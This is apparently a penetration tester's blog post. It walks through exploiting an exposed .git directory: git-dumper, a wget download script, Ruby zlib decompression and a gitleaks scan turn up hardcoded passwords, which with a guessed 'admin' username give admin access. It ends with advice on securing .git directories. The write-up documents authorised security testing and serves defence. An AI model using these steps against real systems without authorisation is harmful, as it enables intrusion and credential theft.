BOOK THIS SPACE FOR AD
ARTICLE ADEvery penetration test begins with reconnaissance, and my initial steps always involve looking for potentially interesting endpoints. During one engagement, I encountered an exposed .git endpoint and I will discuss how I exploited it to gain admin-level access to the application.
While running feroxbuster for content discovery, I discovered a .git endpoint on the application. This exposed several files, but more importantly, it revealed the /objects folder. This folder could potentially leak source code containing credentials, secrets, and other sensitive information. Additionally, examining or scanning the code could reveal further vulnerabilities, which we will discuss later.
I used git-dumper to extract the contents of the /objects directory, saving the output to a file. However, this process only retrieved each object’s URL, not the actual object files.
git-dumper http://website.com/.git ~/website >> file.txtThe output file contained some gibberish that I had to filter out to create a clean file with only the URLs for the next step.
sed 's/.*\(https:\/\/.*\)/\1/' file.txt >> clean_file.txtAfter this, I created a bash script to access all the URLs in the file and download the objects into a folder.
#!/bin/bash# Directory to save the downloaded files
DOWNLOAD_DIR="objects"
# File containing the URLs
URLS_FILE="clean_file.txt"
# Create the directory if it does not exist
mkdir -p "$DOWNLOAD_DIR"
# Read each URL from the file and download the file
while IFS= read -r url; do
echo "Downloading from $url"
# wget to download the file from the URL
wget "$url" -P "$DOWNLOAD_DIR/"
done < "$URLS_FILE"
echo "Download completed."
To read the content in plain text, you first need to decompress it. I used Ruby to decompress the objects.
ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < objectReading hundreds of files individually would take a very long time. Therefore, after downloading the objects, I wrote another script to access each file in the folder, decompress the objects using Ruby, and save the clear text representation into a different file for later use.
#!/bin/bash# Directory with the files to process
INPUT_DIR="objects"
# Output file base name
OUTPUT_BASE="code"
# Counter for output file naming
count=1
# Process each file in the directory
for file in "$INPUT_DIR"/*; do
if [[ -f $file ]]; then
# Apply the Ruby command to the file and save the output
ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < "$file" > "${OUTPUT_BASE}${count}"
# Increment the file counter
((count++))
fi
done
echo "Processing completed."
Now that I had all the objects saved in clear text files, I used gitleaks to search for hardcoded credentials and secrets.
gitleaks detect --source='<location of the directory>' --no-git -vSure enough, this yielded results in a matter of seconds, finding two passwords.
I did not have a username to use with the password, but I made an educated guess that “admin” might work. Using the passwords with the username “admin” granted access to the application as an admin user, compromising the application.
Having access to hundreds of files containing the application’s source code, I could manually read through the code to find other vulnerabilities. However, this would take a lot of time. As a quicker solution, I used the Snyk extension in VS Code (read more about the extension here) to automatically scan for potential vulnerabilities.
In this blog post, we explored how an exposed .git directory can lead to a major security breach. By using tools like feroxbuster, git-dumper, gitleaks, and some bash scripting, we demonstrated how to extract sensitive information, such as hardcoded credentials from the application’s source code, which allowed us to gain admin-level access to the application. The key takeaway is the importance of securing your .git directories and regularly scanning your codebase for vulnerabilities and secrets to help prevent such compromises.
I hope you enjoyed this blog post. Stay curious, and see you next time!